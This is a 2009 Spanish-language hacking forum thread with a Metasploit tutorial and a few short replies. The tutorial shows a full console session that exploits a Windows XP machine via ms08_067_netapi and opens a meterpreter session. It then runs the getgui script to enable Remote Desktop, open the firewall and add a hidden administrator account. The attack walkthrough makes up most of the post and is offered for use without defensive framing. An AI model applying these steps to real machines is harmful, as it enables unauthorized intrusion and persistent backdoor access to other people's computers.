ENTRAR EN EL FOROHACK ANTIGUO (Muchos temas viejos y de menor nivel)
12:00:17 20/08/2017
¿No estas registrado?
Login: Clave:
4 Usuarios en línea: 0 registrados, 4 invitados.
Conéctate y verás los usuarios en línea
Tema: [Metasploit] Habilitar Escritorio Remoto
    Responder
Todos Los Foros -> Hacking General -> [Metasploit] Habilitar Escritorio Remoto
Autor Mensaje (Ver Versión para Imprimir)
roller0
Maestro Nivel 4
Arreglando las imágenes

Mensajes: 749
Registrad@:
29/06/2007
Estado: Desconectad@
Ver último Post
[Metasploit] Habilitar Escritorio Remoto

Habilitar Escritorio Remoto
[Metasploit By: Shell Root>


Una de las muchas herramientas que trae integrada el Metasploit aparte de la que ya hemos visto (keyylogger, Screenshot, Ver Escritorio Remoto ). Tambien podemos agregar un usuario y habilitar el escritorio remoto de la P.C Remota con tan solo una ejecucion de un comando. Aquí veremos el uso de esté servicio del Metasploit.

Primero ingresaremos a la P.C con el exploit:
      * exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:
      * windows/meterpreter/bind_tcp
      * windows/meterpreter/reverse_tcp

En este caso usaremos el PAYLOAD windows/shell/bind_tcp. No explicaré mucho porque para eso esta este POST de mi amigo Rcart.
http://foro.portalhacker.net/index.php/topic,93233.0.html


Código:

                               888                                        888            d8b888
                               888                                        888            Y8P888
                               888                                        888                888
88888b.d88b.   .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 \\\"888 \\\"88bd8P   Y8b888          \\\"88b88K       888 \\\"88b888d88\\\"\\\"88b888888
888   888   88888888888888    .d888888\\\"Y8888b.888   888888888   888888888
888   888   888Y8b.      Y88b. 888   888       X88888 d88P888Y88..88P888Y88b.
888   888   888 \\\"Y8888   \\\"Y888\\\"Y888888 88888P\\\'88888P\\\" 888 \\\"Y88P\\\" 888 \\\"Y888
                                                                888
                                                                888
                                                                888


          =[ metasploit v3.3.2-release [core:3.3 api:1.0>
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
          =[ svn r7808 updated 10 days hago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 10 days hago.
             We recommend that you update the framework at least every other day.
             For information on updating your copy of Metasploit, please see:
                   http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/bind_tcp
[-> The value specified for PAYLOAD is not valid.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*> Started bind handler
[*> Automatically detecting the target...
[*> Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*> Selected Target: Windows XP SP2 Spanish (NX)
[*> Triggering the vulnerability...
[*> Sending stage (723456 bytes)
[*> Meterpreter session 1 opened (192.168.0.2:12995 -> 192.168.0.3:4444)

meterpreter >


Ahora que tenemos el Meterpreter ejecutamos el comando run getgui. Miremos que opciones tiene.

Código:
meterpreter > run getgui                        
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:      getgui -e

OPTIONS:

      -e            Enable RDP only.
      -h            Help menu.
      -p <opt>   The Password of the user to add.
      -u <opt>   The Username of the user to add.

meterpreter >


Ahora ingresamos los parametros necesarios para perfecta ejecución del exploit. Así:

Código:
meterpreter > run getgui -u Shell -p Root
[*> Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*> Carlos Perez carlos_perez@darkoperator.com
[*> Enabling Remote Desktop
[*>       RDP is disabled; enabling it ...
[*> Setting Terminal Services service startup mode
[*>       The Terminal Services service is not set to auto, changing it to auto ...
[*>       Opening port in local firewall if necessary
[*> Setting user account for logon
[*>       Adding User: Shell with Password: Root
[*>       Adding User: Shell to local group Remote Desktop Users
[*>       Adding User: Shell to local group Administrators
[*> You can now login with the created user

Ahora ya tan solo nos queda conectarnos desde la Conexión a Escritorio remoto que trae integrado Windows.

Fuente: ElHacker.Net


§-Un hacker es como un músico, tiene ke seguir unas pautas para cumplir su cometido en esta vida-§
25/12/2009 16:30:26 
HeR0
Maestro Nivel 3
Arreglando las imágenes

Mensajes: 656
Registrad@:
29/10/2008
Estado: Desconectad@
Ir Arriba
RE: [Metasploit] Habilitar Escritorio Remoto

CITA
keyylogger, Screenshot, Ver Escritorio Remoto
esta bueno saber todo esto che (Y) aguante Metasploit noma! :P


25/12/2009 17:05:25 
cls_1231
Usuario novato
Sin Imagen

Mensajes: 3
Registrad@:
28/12/2009
Estado: Desconectad@
Ir Arriba
RE: [Metasploit] Habilitar Escritorio Remoto

Muy bueno el manual, recien me empiezo en esto y al parecer es un mundo de cosas nuevas poco a poco aprendere usar metasploit ahora hice todo lo q dijistes me salio todo bien pero al momento de conectar al escritorio remoto con windows me sale " Las directivas locales de este sistema no le permiten iniciar una sesion interactiva " :( ... eso ya pienso q es de la pc ( estoy probando en una maquina virtual ) alguna sugerencia para saltar eso ?
28/12/2009 11:55:27 
ave_fenix666
Usuario novato
Sin Imagen

Mensajes: 4
Registrad@:
06/01/2010
Estado: Desconectad@
Ir Arriba
RE: [Metasploit] Habilitar Escritorio Remoto

vaya k interesante sin ugar a dudas aprendere mucho sobre esto felicidades por esta informaciòn
06/01/2010 20:42:51 


REGÍSTRATE PARA PODER ENVIAR UN MENSAJE (tardas 20 segundos)

Copyright ForoHack.com